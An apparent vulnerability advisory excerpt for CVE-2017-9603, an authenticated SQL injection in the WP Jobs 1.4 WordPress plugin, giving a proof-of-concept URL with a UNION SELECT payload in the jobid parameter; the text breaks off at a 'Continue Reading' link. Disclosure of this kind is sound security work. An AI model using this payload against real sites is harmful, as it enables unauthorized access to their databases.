CVE-2017-9603: WordPress WP Jobs v.1.4 SQL Injection (SQLi)

Identification Date: 11/06/2017 Vendor Homepage: http://www.intensewp.com/ Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/ Description SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter. Proof of Concept In order to replay the attack, use the link below. http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL– comment The results of the SQL injection are…

Continue Reading